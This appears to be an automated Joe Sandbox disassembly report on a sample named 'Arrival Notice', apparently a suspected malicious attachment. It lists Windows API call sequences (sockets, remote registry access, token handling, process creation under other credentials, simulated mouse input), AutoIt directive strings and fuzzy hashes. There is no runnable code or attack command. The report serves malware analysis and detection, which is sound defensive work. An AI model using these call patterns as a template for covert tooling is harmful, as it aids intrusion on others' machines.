                                              • API String ID: 2178440468-0
                                              • Opcode ID: aeff89f29008a2a1c9cfab0fc9f4ded3b696a1a40ffd9d45524bdc7f3c2b870b
                                              • Instruction ID: bc99fd222ded3c58595779b4d08b54c161685ece3f06a962dfa5f78d2f03eee6
                                              • Opcode Fuzzy Hash: aeff89f29008a2a1c9cfab0fc9f4ded3b696a1a40ffd9d45524bdc7f3c2b870b
                                              • Instruction Fuzzy Hash: DD315730659214AFDB20CF1ADC88F553BE5FB4A362F9801A8F9018B2B5DB31EC45EB41
                                              APIs
                                                • Part of subcall function 009480A0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 009480CB
                                              • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 009464D9
                                              • WSAGetLastError.WSOCK32(00000000), ref: 009464E8
                                              • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00946521
                                              • connect.WSOCK32(00000000,?,00000010), ref: 0094652A
                                              • WSAGetLastError.WSOCK32 ref: 00946534
                                              • closesocket.WSOCK32(00000000), ref: 0094655D
                                              • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00946576
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                              • String ID:
                                              • API String ID: 910771015-0
                                              • Opcode ID: ed365bba1650f3a59dd75c43f8dcdb50a0417777c91ac5e91f5ccdc59b0099d1
                                              • Instruction ID: 590e1f927b2442d1e415a6699ced31718cfa2af096c810601d47c4a6d8db216d
                                              • Opcode Fuzzy Hash: ed365bba1650f3a59dd75c43f8dcdb50a0417777c91ac5e91f5ccdc59b0099d1
                                              • Instruction Fuzzy Hash: D931A171610218ABDF10AF24CC95FBE7BBCEB45721F004029F94AD7291DB74AD04DB62
                                              APIs
                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0092E0FA
                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0092E120
                                              • SysAllocString.OLEAUT32(00000000), ref: 0092E123
                                              • SysAllocString.OLEAUT32 ref: 0092E144
                                              • SysFreeString.OLEAUT32 ref: 0092E14D
                                              • StringFromGUID2.OLE32(?,?,00000028), ref: 0092E167
                                              • SysAllocString.OLEAUT32(?), ref: 0092E175
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                              • String ID:
                                              • API String ID: 3761583154-0
                                              • Opcode ID: 2cd840b602cc202e86cd193c33977fcf06580c3388dc6cc37a15e96259b0a8ef
                                              • Instruction ID: f823bfc70b503edf149603e4a263878b556f95ab1667cf1e3d4ae59427865b53
                                              • Opcode Fuzzy Hash: 2cd840b602cc202e86cd193c33977fcf06580c3388dc6cc37a15e96259b0a8ef
                                              • Instruction Fuzzy Hash: 46217435608218AFDB10AFA9DCC8CAB77ECEB09760B108135F915CB2A5DB74DC419B64
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: __wcsnicmp
                                              • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                              • API String ID: 1038674560-2734436370
                                              • Opcode ID: 4be5c4903158541882a0033b1761ce5d62a5dba179c18425b165f17e4b62281a
                                              • Instruction ID: e2a227eeae932f17c81e9921cea8191e72c2cdcce8935dd624cba0cdc3a8e32b
                                              • Opcode Fuzzy Hash: 4be5c4903158541882a0033b1761ce5d62a5dba179c18425b165f17e4b62281a
                                              • Instruction Fuzzy Hash: 03214572100A75A6D230E738ED22EB773ACEF51300F104436F98AC7189EB50AD818792
                                              APIs
                                                • Part of subcall function 008D1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 008D1D73
                                                • Part of subcall function 008D1D35: GetStockObject.GDI32(00000011), ref: 008D1D87
                                                • Part of subcall function 008D1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 008D1D91
                                              • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 009578A1
                                              • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 009578AE
                                              • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 009578B9
                                              • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 009578C8
                                              • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 009578D4
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: MessageSend$CreateObjectStockWindow
                                              • String ID: Msctls_Progress32
                                              • API String ID: 1025951953-3636473452
                                              • Opcode ID: 78331897f83ccfc4e46c9979a0c5bda8ab12fc804465c8ef96a922d98fc3caf4
                                              • Instruction ID: 7241f2dc5ea4287ee4f2dbb09eee557b03eb32adfa16dd1ea0891b0dd59d2fc9
                                              • Opcode Fuzzy Hash: 78331897f83ccfc4e46c9979a0c5bda8ab12fc804465c8ef96a922d98fc3caf4
                                              • Instruction Fuzzy Hash: CA1190B2114219BFEF159FA5CC85EEB7F6DEF48768F014115BB04A2090C772AC21DBA0
                                              APIs
                                              • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,008F4292,?), ref: 008F41E3
                                              • GetProcAddress.KERNEL32(00000000), ref: 008F41EA
                                              • EncodePointer.KERNEL32(00000000), ref: 008F41F6
                                              • DecodePointer.KERNEL32(00000001,008F4292,?), ref: 008F4213
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                              • String ID: RoInitialize$combase.dll
                                              • API String ID: 3489934621-340411864
                                              • Opcode ID: 293a392d95c8caf67bf91bfa1eda11eb273fe6dbd0bdc8ed006bbd50eec10998
                                              • Instruction ID: cb1a9d7d4a3f6578c7ec438bc82c37105aba5963ea12667d71712f28e8e292da
                                              • Opcode Fuzzy Hash: 293a392d95c8caf67bf91bfa1eda11eb273fe6dbd0bdc8ed006bbd50eec10998
                                              • Instruction Fuzzy Hash: E2E01AB06BC700AFEB216BBAEC29F153AA4F760757F504436B522D50E0DBB54096AF00
                                              APIs
                                              • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,008F41B8), ref: 008F42B8
                                              • GetProcAddress.KERNEL32(00000000), ref: 008F42BF
                                              • EncodePointer.KERNEL32(00000000), ref: 008F42CA
                                              • DecodePointer.KERNEL32(008F41B8), ref: 008F42E5
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                              • String ID: RoUninitialize$combase.dll
                                              • API String ID: 3489934621-2819208100
                                              • Opcode ID: 96396605e42c14df6fb3b771f17121169c851a19d1c0ab93773f0ee4ef9b043d
                                              • Instruction ID: 8c24f56cba16ab32d6949d6035112c49b12526ab5c0cdc827b11f5a763e543ec
                                              • Opcode Fuzzy Hash: 96396605e42c14df6fb3b771f17121169c851a19d1c0ab93773f0ee4ef9b043d
                                              • Instruction Fuzzy Hash: CEE012785AD700ABEA21AB36EC18F023AA4B73079AF100036F105E20B0CBB04541EB08
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: _memmove$__itow__swprintf
                                              • String ID:
                                              • API String ID: 3253778849-0
                                              • Opcode ID: f343bbedb4053b5325c5b3423e46e20e90ca18b2e29f67c49e07f67a5b03233d
                                              • Instruction ID: f35fb2ae296d3f5e98ecfe5ec2cc4cb5bb276deac6ce40353c2ad024c0cbef86
                                              • Opcode Fuzzy Hash: f343bbedb4053b5325c5b3423e46e20e90ca18b2e29f67c49e07f67a5b03233d
                                              • Instruction Fuzzy Hash: 3B619E3050065AABCF11EF28C895FFE7BA9FF44318F04861AF9959B292DB349941CB52
                                              APIs
                                                • Part of subcall function 008D7F41: _memmove.LIBCMT ref: 008D7F82
                                                • Part of subcall function 009510A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00950038,?,?), ref: 009510BC
                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00950548
                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00950588
                                              • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 009505AB
                                              • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 009505D4
                                              • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00950617
                                              • RegCloseKey.ADVAPI32(00000000), ref: 00950624
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                              • String ID:
                                              • API String ID: 4046560759-0
                                              • Opcode ID: c3d81dffd75238552549f3d3abeb54046eaa277e39e11982a18efbb6e3c58a91
                                              • Instruction ID: 2aa46fb912f62add0161c2df0999fd948767cd5eed17b567bfaab6462bef832e
                                              • Opcode Fuzzy Hash: c3d81dffd75238552549f3d3abeb54046eaa277e39e11982a18efbb6e3c58a91
                                              • Instruction Fuzzy Hash: 9D513A31108200AFCB14EF29D895E6ABBE8FF85315F04491EF995972A1EB31E909DB52
                                              APIs
                                              • GetMenu.USER32(?), ref: 00955A82
                                              • GetMenuItemCount.USER32(00000000), ref: 00955AB9
                                              • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00955AE1
                                              • GetMenuItemID.USER32(?,?), ref: 00955B50
                                              • GetSubMenu.USER32(?,?), ref: 00955B5E
                                              • PostMessageW.USER32(?,00000111,?,00000000), ref: 00955BAF
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: Menu$Item$CountMessagePostString
                                              • String ID:
                                              • API String ID: 650687236-0
                                              • Opcode ID: d4e5826293ef4e640a58737d5f23b5a4b29884fce973ba136f3dccfeaf3d2b2c
                                              • Instruction ID: 0e8ff3a8d07144d79c67b4fc80e3523580a80556d30f9737406988b1b4a6d099
                                              • Opcode Fuzzy Hash: d4e5826293ef4e640a58737d5f23b5a4b29884fce973ba136f3dccfeaf3d2b2c
                                              • Instruction Fuzzy Hash: DA517C31A00619EFCF11EFA5C855AAEBBB4FF48321F11446AED01A7352DB34AE458B91
                                              APIs
                                              • VariantInit.OLEAUT32(?), ref: 0092F3F7
                                              • VariantClear.OLEAUT32(00000013), ref: 0092F469
                                              • VariantClear.OLEAUT32(00000000), ref: 0092F4C4
                                              • _memmove.LIBCMT ref: 0092F4EE
                                              • VariantClear.OLEAUT32(?), ref: 0092F53B
                                              • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 0092F569
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: Variant$Clear$ChangeInitType_memmove
                                              • String ID:
                                              • API String ID: 1101466143-0
                                              • Opcode ID: df30a1f9bbef558cf682f4ff47a7fe8b9444363e3bac0d2c1d3464e71d317bfc
                                              • Instruction ID: 92769d2c883e08054995728610082c6abd8387facbc067a62fb8e9e522e10015
                                              • Opcode Fuzzy Hash: df30a1f9bbef558cf682f4ff47a7fe8b9444363e3bac0d2c1d3464e71d317bfc
                                              • Instruction Fuzzy Hash: 7D5167B5A00219AFCB10DF58D894EAAB7B8FF48314B158569F959DB314D730E911CBA0
                                              APIs
                                              • _memset.LIBCMT ref: 00932747
                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00932792
                                              • IsMenu.USER32(00000000), ref: 009327B2
                                              • CreatePopupMenu.USER32 ref: 009327E6
                                              • GetMenuItemCount.USER32(000000FF), ref: 00932844
                                              • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00932875
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                              • String ID:
                                              • API String ID: 3311875123-0
                                              • Opcode ID: b72b28ab1aad7cc8b12ec8b3deeed67e2d3848cec91f6f2910d0871efdcde405
                                              • Instruction ID: e85b34f5e612faa4cae7f1e346d728e30ff3d9b82e0026410b22cca28a313f10
                                              • Opcode Fuzzy Hash: b72b28ab1aad7cc8b12ec8b3deeed67e2d3848cec91f6f2910d0871efdcde405
                                              • Instruction Fuzzy Hash: 00519B70A0430AEFDF25CF68D888BAEBBF9BF44314F104669E911AB291E7709945CF51
                                              APIs
                                                • Part of subcall function 008D2612: GetWindowLongW.USER32(?,000000EB), ref: 008D2623
                                              • BeginPaint.USER32(?,?,?,?,?,?), ref: 008D179A
                                              • GetWindowRect.USER32(?,?), ref: 008D17FE
                                              • ScreenToClient.USER32(?,?), ref: 008D181B
                                              • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 008D182C
                                              • EndPaint.USER32(?,?), ref: 008D1876
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                              • String ID:
                                              • API String ID: 1827037458-0
                                              • Opcode ID: edf1197478b1c948c94bda92e44a3a9e90a8a07f4cdc890664f597ac37db7a2f
                                              • Instruction ID: 718dac23d1c991d497a593184a8fd1be7c01433d6df58ddde113e87ba615dbfd
                                              • Opcode Fuzzy Hash: edf1197478b1c948c94bda92e44a3a9e90a8a07f4cdc890664f597ac37db7a2f
                                              • Instruction Fuzzy Hash: B4418171218305AFDB10DF2ADC88B7A7BE8FF45724F14066AF554C72A1C7319845EB62
                                              APIs
                                              • ShowWindow.USER32(009967B0,00000000,015676F8,?,?,009967B0,?,0095B862,?,?), ref: 0095B9CC
                                              • EnableWindow.USER32(00000000,00000000), ref: 0095B9F0
                                              • ShowWindow.USER32(009967B0,00000000,015676F8,?,?,009967B0,?,0095B862,?,?), ref: 0095BA50
                                              • ShowWindow.USER32(00000000,00000004,?,0095B862,?,?), ref: 0095BA62
                                              • EnableWindow.USER32(00000000,00000001), ref: 0095BA86
                                              • SendMessageW.USER32(?,0000130C,?,00000000), ref: 0095BAA9
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: Window$Show$Enable$MessageSend
                                              • String ID:
                                              • API String ID: 642888154-0
                                              • Opcode ID: 633f58ec7066f84bea06bffcf88a0cf5900f210440e05b4c39c57df767088407
                                              • Instruction ID: 01d2c56cb506be7b6aa89333d30ec64a300ccb85e6b7dc5d02878d98ed7b3a1a
                                              • Opcode Fuzzy Hash: 633f58ec7066f84bea06bffcf88a0cf5900f210440e05b4c39c57df767088407
                                              • Instruction Fuzzy Hash: 16416230604645AFDB22CF16C499B957BE4FF05316F5842B9FE488F2A2C731A849DB51
                                              APIs
                                              • GetForegroundWindow.USER32(?,?,?,?,?,?,00945134,?,?,00000000,00000001), ref: 009473BF
                                                • Part of subcall function 00943C94: GetWindowRect.USER32(?,?), ref: 00943CA7
                                              • GetDesktopWindow.USER32 ref: 009473E9
                                              • GetWindowRect.USER32(00000000), ref: 009473F0
                                              • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00947422
                                                • Part of subcall function 009354E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0093555E
                                              • GetCursorPos.USER32(?), ref: 0094744E
                                              • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 009474AC
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                              • String ID:
                                              • API String ID: 4137160315-0
                                              • Opcode ID: f21c79d161c03aac5c41c7f4f52649cf260fbf07dd44c9cad00c0a203621acc3
                                              • Instruction ID: 84a33562c709011568c2678e0bec0cd7ce390791ed3371945c5aa530ad6104ff
                                              • Opcode Fuzzy Hash: f21c79d161c03aac5c41c7f4f52649cf260fbf07dd44c9cad00c0a203621acc3
                                              • Instruction Fuzzy Hash: 4031D572509309AFD720DF55D849FABBBEAFF88314F004919F58997191D730EA09CB92
                                              APIs
                                                • Part of subcall function 009285F1: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00928608
                                                • Part of subcall function 009285F1: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00928612
                                                • Part of subcall function 009285F1: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00928621
                                                • Part of subcall function 009285F1: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00928628
                                                • Part of subcall function 009285F1: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0092863E
                                              • GetLengthSid.ADVAPI32(?,00000000,00928977), ref: 00928DAC
                                              • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00928DB8
                                              • HeapAlloc.KERNEL32(00000000), ref: 00928DBF
                                              • CopySid.ADVAPI32(00000000,00000000,?), ref: 00928DD8
                                              • GetProcessHeap.KERNEL32(00000000,00000000,00928977), ref: 00928DEC
                                              • HeapFree.KERNEL32(00000000), ref: 00928DF3
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                              • String ID:
                                              • API String ID: 3008561057-0
                                              • Opcode ID: d83888666d1ab695550a74c1cc815a10fdbd2b0207b9d5679c07286943de3979
                                              • Instruction ID: 0fc38eb1ed93206e3ac73cd04b0e172127d55213fa13ab66499d29d472c87c9d
                                              • Opcode Fuzzy Hash: d83888666d1ab695550a74c1cc815a10fdbd2b0207b9d5679c07286943de3979
                                              • Instruction Fuzzy Hash: F611EE31516615FFDB109FA5EC18BAF7BADEF55326F108029F84593294CB32A908DB60
                                              APIs
                                              • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00928B2A
                                              • OpenProcessToken.ADVAPI32(00000000), ref: 00928B31
                                              • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00928B40
                                              • CloseHandle.KERNEL32(00000004), ref: 00928B4B
                                              • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00928B7A
                                              • DestroyEnvironmentBlock.USERENV(00000000), ref: 00928B8E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
